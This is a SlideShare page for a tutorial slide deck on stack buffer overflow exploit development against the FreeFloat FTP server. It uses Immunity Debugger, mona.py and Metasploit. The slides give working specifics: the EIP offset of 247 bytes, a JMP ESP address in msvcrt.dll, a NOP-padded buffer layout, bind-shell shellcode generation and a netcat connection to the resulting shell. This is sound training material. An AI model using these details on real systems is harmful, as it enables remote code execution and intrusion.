SlideShare a Scribd company logo

Dive into exploit development with Immunity Debugger, Mona.py and Metasploit

Payampardaz
Payampardaz

The document provides an introduction to exploit development. It discusses preparing a virtual lab with tools like Immunity Debugger, Mona.py, pvefindaddr.py and Metasploit. It covers basic buffer overflow exploitation techniques like overwriting EIP and using RETURN oriented programming. The document demonstrates a basic stack-based buffer overflow exploit against the FreeFloat FTP server as a tutorial, covering steps like generating a cyclic pattern, finding the offset and using mona to find a JMP ESP instruction to redirect execution. It also discusses using msfpayload to generate Windows bind shellcode and msfencode to escape bad characters before testing the proof of concept exploit.

Technology
1 of 59
Download to read offline
Dive into exploit development Mohsen Ahmadi
Disclaimer If you’re someone that wants to build exploits to partake in illegal or immoral activity, please go elsewhere
Introduction to Exploit Development Explore some basic ideas behind exploits How we can execute our shellcodes Each part contains a technique of how to successfully exploit a program in wild We’ll cover every thing from SRP to ROP
Preparing our laboratory in Virtual Machine Immunity Debugger Mona.py Pvefindaddr.py Metasploit Framework Virtualization Software
Immunity Debugger (cont) powerful new way to write exploits, analyze malware, and reverse engineer binary files Immunity Debugger is similar to Ollydbg but it has python support Cuts exploit development time by 50% Connectivity to fuzzers and exploit development tools http://debugger.immunityinc.com/ID_register.py
Features Remote command bar Python Scripting Built in Graphing Immunity Debugger is light Immunity Debugger exposes the information you need
Remote command bar
Python Scripting
Built in Graphing
Immunity Debugger is light
Immunity Debugger exposes the information you need
Mona.py(cont)  Mona.py is plug-in for Immunity Debugger which is developed by Corelan Team  Mona also requires a small amount of configuration before you can start using it  human error rates are high when dealing with binary and hex  Mona can scan data for patterns much faster and more accurately than we can  Mona can even build ROP structures
SET OF Commands SUPPORTED BY MONA
Mona lisa We’ll talk about how to configure and work with Mona in later slides!
Pvefindaddr.py Well in short terms !pvefindaddr is a PyCommand for Immunity Debugger made by corelanc0d3r which can do almost everything (if not everything) that you would need whenbuilding an exploit
Metasploit Framework Generating our desired shellcodes Escaping bad characters by msfencode Receiving any connection back to our computer Try to use Kali linux which fulfills you needs
Virtualization Software
X86 CPU registers(cont)  EAX - Main register used in arithmetic calculations. Also known as accumulator, as it holds results of arithmetic operations and function return values.  EBX - The Base Register. Pointer to data in the DS segment. Used to store the base address of the program.  ECX - The Counter register is often used to hold a value representing the number of times a process is to be repeated. Used for loop and string operations.  EDX - A general purpose registers. Also used for I/O operations. Helps extend EAX to 64-bits.  ESI - Source Index register. Pointer to data in the segment pointed to by the DS register. Used as an offset address in string and array operations. It holds the address from where to read data.
X86 CPU registers  EBP - Base Pointer. Pointer to data on the stack (in the SS segment). It points to the bottom of the current stack frame. It is used to reference local variables.  ESP - Stack Pointer (in the SS segment). It points to the top of the current stack frame. It is used to reference local variables.  EIP - Instruction Pointer (holds the address of the next instruction to be executed)  EDI - Destination Index register. Pointer to data (or destination) in the segment pointed to by the ES register. Used as an offset address in string and array operations. It holds the implied write address of all string operations.
BOF Buffer overflow: a memory location receives more data than it was meant to Stack overflow: usually a Buffer Overflow that writes over Stack segment beyond the end of the stack
Look for?!! our buffer needs to overwrite EIP one of the CPU registers needs to contain our buffer
How does it work? 1) We get an overly string to our program 2) this string overwrites EIP and part of it is stored in a CPU register 3) we find a pointer that points to the register that contains our buffer 4) we put that pointer in the correct place in our buffer so it overwrites EIP 5) when the program reaches our pointer it executes the instruction and jumps to the register that contains our buffer Finally we place our shellcode in the part of the buffer that is stored in the CPU register!
First scenario  Exploit Development: Kali Linux  Debugging Machine: Windows XP PRO SP3  Vulnerable Software: FreeFloat FTP  Write simple BOF exploit from scratch
Direct EIP overwrie  Exploit Development: Kali Linux  Debugging Machine: Windows XP PRO SP3  Vulnerable Software: FreeFloat FTP  Write simple BOF exploit from scratch For first tutorial we’ll just rely on “x00x0Ax0D” bad characters
Getting started with Immunity debugger  Starting the Debugger  Opening and Attaching to the debugging target application  CPU windows  Registers windows I’ll explain each part separately
Starting the Debugger  Before starting, you need to ensure that you are using an account that has the appropriate privileges, generally local Administrator equivalent  “Run as administrator”
Opening and Attaching to the debugging target application  By opening the target executable from disk using the File->Open menu option  By attaching to an already running program using the File->Attach menu option
opening the target executable from disk
Attach to the target
CPU windows  actual instructions of the program we are about to run  I will be referring to this as the CPU instruction or disassembler pane  Memory address  Opcode  X86 MASM syntax Alt+C
Registers / flags window  These registers are small storage areas within the CPU itself, and they are used to facilitate various operations that are performed within the X86 assembly language
Memory dump pane
Stack pane
Open program  First open FreeFloat FTP server  When service goes up check out for state of connections on your target machine
Attach to process
Replicate the crash(cont)  create a POC skeleton exploit to crash the FTP server  FTP servers comes with built-in anonymous user account  MKD ~ make directory FTP port is 21
POC!  Send your POC payload to server  Check EIP is overwritten with “x41” ?  Which registers contain part of our buffer ?  Try to find out which register contain more chunk of our data ? “x41” ~ “A”
Registers EIP overwritten & EDI, ESP contains part of our buffer
Metasploit pattern  We now need to determine the correct offset in order get code execution  pattern_create.rb  the script will generate a string composed of unique patterns that we can use to replace our sequence of 'A's Pay attention that you keep the original buffer length since a varying buffer length may change the program crash
Again replicate your crash(cont)  Send your payload to FTP service and check for EIP value which Is overwritten by metasploit pattern
Check EIP!  Find the offset which EIP is overwritten by our pattern  !Mona comes into place
Configure !mona  Download Mona, copy it to PyCommands directory of Immunity Debugger  Use the following command to config mona  %p based on process name  %i based on process id
Find cyclic pattern with !mona  !mona findmsp  From the analysis we can see that EIP is overwritten by the 4-bytes which directly follow after the initial 247-bytes of our buffer
Egg hunter Limited Buffer Space Shellcode = Broken Shellcode
Check again  Now our buffer should be look like this:  Buffer=“A”*247+”B”*4+”C”*749  “B” ~ “x42”
Replace “B”s with pointer to ESP  we can replace those B's with a pointer that redirects execution flow to ESP  keep in mind that our pointer can't contain any bad characters Do you remember bad characters? “x00x0Ax0D”
JMP ESP  To find a valid pointer which redirect us to ESP we can use “mona” with the following command  !mona jmp –r esp
Endian order of the X86 processor Big Endian (Others) Little Endian (Intel) Register Register Low Memory Addresses CE FA ED FE High Memory Addresses FE ED FA CE CEFAEDFE CEFAEDFE 0x0 0x1 0x2 0x3 00 00 00 000x4 0x5
Msvcrt.dll (MS12-013)  Starting from Visual Studio 2003, any program that is dynamically linked to the C Run-Time library will use msvcrXX.dll instead of msvcrt.dll  If your program statically linked with this visual C run time library your program is safe  %windir%system32
Our pointer to JMP ESP  0x77c35459 : push esp # ret [msvcrt.dll]  C:WINDOWSsystem32msvcrt.dll  Put a breakpoint on our pointer (F2)
Put our Shellcode into buffer  Inserting our payload in the part of the buffer that is now made up of C's  we would like to have the buffer length modified dynamically  insert some NOP's (No Operation Performed = x90) before our payload as padding buffer = "A"*247 + "x59x54xC3x77" +”x90”*20+shellcode + "C"*(749-(len(shellcode)+20))
Generate our Shellcode with msfpayload(cont)  Msfpayload –l | grep windows  Metasploit has a command-line shellcode generation function called msfpayload  To use msfpayload, you need to know the options associated with each payload Msfpayload -O
Shell_bind_tcp
Msfencode | bad character escaping  Encode your exploit to prevent broken shellcode
Check netstat before & after POC!  If Our payload work without raising any error will spawn a shell for us on port 3320 :D let’s check it with NetCat
Game over!  NC –nvv 192.168.149.153 3320  V: verbose mode  N: use IP only don’t resolve DNS Hopefully you now understand the basics of a stack- based buffer overflow
OS DLL or application  If you choose an OS DLL, because they are not same in various versions of windows so your exploit isn't portable  These DLL’s are not randomized on XP but they are on Windows 7  If your application moves between operating system versions, you're still going to be referencing a JMP ESP within the application itself, and not be OS dependent
Any question?!
Thank you 

Recommended

SEH based buffer overflow vulnerability exploitation
SEH based buffer overflow vulnerability exploitationSEH based buffer overflow vulnerability exploitation
SEH based buffer overflow vulnerability exploitationPayampardaz
 
Basic buffer overflow part1
Basic buffer overflow part1Basic buffer overflow part1
Basic buffer overflow part1Payampardaz
 
Reversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basicsReversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basicsCysinfo Cyber Security Community
 
Exploit techniques and mitigation
Exploit techniques and mitigationExploit techniques and mitigation
Exploit techniques and mitigationYaniv Shani
 
Buffer Overflow
Buffer OverflowBuffer Overflow
Buffer OverflowKaustubh Padwad
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflowقصي نسور
 
CNIT 127 Ch 4: Introduction to format string bugs
CNIT 127 Ch 4: Introduction to format string bugsCNIT 127 Ch 4: Introduction to format string bugs
CNIT 127 Ch 4: Introduction to format string bugsSam Bowne
 
Writing simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsWriting simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsD4rk357 a
 

Recommended

SEH based buffer overflow vulnerability exploitation
SEH based buffer overflow vulnerability exploitationSEH based buffer overflow vulnerability exploitation
SEH based buffer overflow vulnerability exploitationPayampardaz
 
Basic buffer overflow part1
Basic buffer overflow part1Basic buffer overflow part1
Basic buffer overflow part1Payampardaz
 
Reversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basicsReversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basicsCysinfo Cyber Security Community
 
Exploit techniques and mitigation
Exploit techniques and mitigationExploit techniques and mitigation
Exploit techniques and mitigationYaniv Shani
 
Buffer Overflow
Buffer OverflowBuffer Overflow
Buffer OverflowKaustubh Padwad
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflowقصي نسور
 
CNIT 127 Ch 4: Introduction to format string bugs
CNIT 127 Ch 4: Introduction to format string bugsCNIT 127 Ch 4: Introduction to format string bugs
CNIT 127 Ch 4: Introduction to format string bugsSam Bowne
 
Writing simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsWriting simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsD4rk357 a
 
OTP application (with gen server child) - simple example
OTP application (with gen server child) - simple exampleOTP application (with gen server child) - simple example
OTP application (with gen server child) - simple exampleYangJerng Hwa
 
Tranning-2
Tranning-2Tranning-2
Tranning-2Ali Hussain
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesEran Goldstein
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJapneet Singh
 
Anatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow AttackAnatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow AttackRob Gillen
 
CNIT 127: 4: Format string bugs
CNIT 127: 4: Format string bugsCNIT 127: 4: Format string bugs
CNIT 127: 4: Format string bugsSam Bowne
 
Buffer overflow explained
Buffer overflow explainedBuffer overflow explained
Buffer overflow explainedTeja Babu
 
Concurrency in Elixir with OTP
Concurrency in Elixir with OTPConcurrency in Elixir with OTP
Concurrency in Elixir with OTPJustin Reese
 
CNIT 126 13: Data Encoding
CNIT 126 13: Data EncodingCNIT 126 13: Data Encoding
CNIT 126 13: Data EncodingSam Bowne
 
Python Basics
Python BasicsPython Basics
Python Basicsprimeteacher32
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Elvin Gentiles
 
Seh based attack
Seh based attackSeh based attack
Seh based attackMihir Shah
 
Gift-VT Tools Development Overview
Gift-VT Tools Development OverviewGift-VT Tools Development Overview
Gift-VT Tools Development Overviewstn_tkiller
 
Analytics tools and Instruments
Analytics tools and InstrumentsAnalytics tools and Instruments
Analytics tools and InstrumentsKrunal Soni
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointTyler Shields
 
CNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code AuditingCNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code AuditingSam Bowne
 
OIVM
OIVMOIVM
OIVMAdwiteeya Agrawal
 
Using OTP and gen_server Effectively
Using OTP and gen_server EffectivelyUsing OTP and gen_server Effectively
Using OTP and gen_server EffectivelyKen Pratt
 
Advanced malware analysis training session5 reversing automation
Advanced malware analysis training session5 reversing automationAdvanced malware analysis training session5 reversing automation
Advanced malware analysis training session5 reversing automationCysinfo Cyber Security Community
 
Planet of the AOPs
Planet of the AOPsPlanet of the AOPs
Planet of the AOPsJames Ward
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash CourseUTD Computer Security Group
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackTomer Zait
 

More Related Content

What's hot

OTP application (with gen server child) - simple example
OTP application (with gen server child) - simple exampleOTP application (with gen server child) - simple example
OTP application (with gen server child) - simple exampleYangJerng Hwa
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesEran Goldstein
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJapneet Singh
 
Anatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow AttackAnatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow AttackRob Gillen
 
CNIT 127: 4: Format string bugs
CNIT 127: 4: Format string bugsCNIT 127: 4: Format string bugs
CNIT 127: 4: Format string bugsSam Bowne
 
Buffer overflow explained
Buffer overflow explainedBuffer overflow explained
Buffer overflow explainedTeja Babu
 
Concurrency in Elixir with OTP
Concurrency in Elixir with OTPConcurrency in Elixir with OTP
Concurrency in Elixir with OTPJustin Reese
 
CNIT 126 13: Data Encoding
CNIT 126 13: Data EncodingCNIT 126 13: Data Encoding
CNIT 126 13: Data EncodingSam Bowne
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Elvin Gentiles
 
Seh based attack
Seh based attackSeh based attack
Seh based attackMihir Shah
 
Gift-VT Tools Development Overview
Gift-VT Tools Development OverviewGift-VT Tools Development Overview
Gift-VT Tools Development Overviewstn_tkiller
 
Analytics tools and Instruments
Analytics tools and InstrumentsAnalytics tools and Instruments
Analytics tools and InstrumentsKrunal Soni
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointTyler Shields
 
CNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code AuditingCNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code AuditingSam Bowne
 
Using OTP and gen_server Effectively
Using OTP and gen_server EffectivelyUsing OTP and gen_server Effectively
Using OTP and gen_server EffectivelyKen Pratt
 
Advanced malware analysis training session5 reversing automation
Advanced malware analysis training session5 reversing automationAdvanced malware analysis training session5 reversing automation
Advanced malware analysis training session5 reversing automationCysinfo Cyber Security Community
 
Planet of the AOPs
Planet of the AOPsPlanet of the AOPs
Planet of the AOPsJames Ward
 

What's hot (20)

OTP application (with gen server child) - simple example
OTP application (with gen server child) - simple exampleOTP application (with gen server child) - simple example
OTP application (with gen server child) - simple example
 
Tranning-2
Tranning-2Tranning-2
Tranning-2
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniques
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
Anatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow AttackAnatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow Attack
 
CNIT 127: 4: Format string bugs
CNIT 127: 4: Format string bugsCNIT 127: 4: Format string bugs
CNIT 127: 4: Format string bugs
 
Buffer overflow explained
Buffer overflow explainedBuffer overflow explained
Buffer overflow explained
 
Concurrency in Elixir with OTP
Concurrency in Elixir with OTPConcurrency in Elixir with OTP
Concurrency in Elixir with OTP
 
CNIT 126 13: Data Encoding
CNIT 126 13: Data EncodingCNIT 126 13: Data Encoding
CNIT 126 13: Data Encoding
 
Python Basics
Python BasicsPython Basics
Python Basics
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
 
Seh based attack
Seh based attackSeh based attack
Seh based attack
 
Gift-VT Tools Development Overview
Gift-VT Tools Development OverviewGift-VT Tools Development Overview
Gift-VT Tools Development Overview
 
Analytics tools and Instruments
Analytics tools and InstrumentsAnalytics tools and Instruments
Analytics tools and Instruments
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
 
CNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code AuditingCNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code Auditing
 
OIVM
OIVMOIVM
OIVM
 
Using OTP and gen_server Effectively
Using OTP and gen_server EffectivelyUsing OTP and gen_server Effectively
Using OTP and gen_server Effectively
 
Advanced malware analysis training session5 reversing automation
Advanced malware analysis training session5 reversing automationAdvanced malware analysis training session5 reversing automation
Advanced malware analysis training session5 reversing automation
 
Planet of the AOPs
Planet of the AOPsPlanet of the AOPs
Planet of the AOPs
 

Similar to Dive into exploit development with Immunity Debugger, Mona.py and Metasploit

Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackTomer Zait
 
Introduction to Assembly Language Programming
Introduction to Assembly Language ProgrammingIntroduction to Assembly Language Programming
Introduction to Assembly Language ProgrammingRahul P
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackironSource
 
Buffer overflow tutorial
Buffer overflow tutorialBuffer overflow tutorial
Buffer overflow tutorialhughpearse
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
Assembly level language
Assembly level languageAssembly level language
Assembly level languagePDFSHARE
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredKory Kyzar
 
NASM Introduction.pptx
NASM Introduction.pptxNASM Introduction.pptx
NASM Introduction.pptxAnshKarwa
 
My cool new Slideshow!
My cool new Slideshow!My cool new Slideshow!
My cool new Slideshow!manishamorya
 
Malware Analysis - x86 Disassembly
Malware Analysis - x86 DisassemblyMalware Analysis - x86 Disassembly
Malware Analysis - x86 DisassemblyNatraj G
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowVi Tính Hoàng Nam
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsAjin Abraham
 
Pascal script maxbox_ekon_14_2
Pascal script maxbox_ekon_14_2Pascal script maxbox_ekon_14_2
Pascal script maxbox_ekon_14_2Max Kleiner
 
Os Worthington
Os WorthingtonOs Worthington
Os Worthingtonoscon2007
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick reviewCe.Se.N.A. Security
 

Similar to Dive into exploit development with Immunity Debugger, Mona.py and Metasploit (20)

Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
 
Introduction to Assembly Language Programming
Introduction to Assembly Language ProgrammingIntroduction to Assembly Language Programming
Introduction to Assembly Language Programming
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
 
Buffer overflow tutorial
Buffer overflow tutorialBuffer overflow tutorial
Buffer overflow tutorial
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
Assembly level language
Assembly level languageAssembly level language
Assembly level language
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly Required
 
NASM Introduction.pptx
NASM Introduction.pptxNASM Introduction.pptx
NASM Introduction.pptx
 
My cool new Slideshow!
My cool new Slideshow!My cool new Slideshow!
My cool new Slideshow!
 
Malware Analysis - x86 Disassembly
Malware Analysis - x86 DisassemblyMalware Analysis - x86 Disassembly
Malware Analysis - x86 Disassembly
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflow
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
 
Pascal script maxbox_ekon_14_2
Pascal script maxbox_ekon_14_2Pascal script maxbox_ekon_14_2
Pascal script maxbox_ekon_14_2
 
Design
DesignDesign
Design
 
Os Worthington
Os WorthingtonOs Worthington
Os Worthington
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
 
fg.workshop: Software vulnerability
fg.workshop: Software vulnerabilityfg.workshop: Software vulnerability
fg.workshop: Software vulnerability
 
Chapter1.pdf
Chapter1.pdfChapter1.pdf
Chapter1.pdf
 
C programming session10
C programming session10C programming session10
C programming session10
 

Recently uploaded

WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 

Recently uploaded (20)

WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
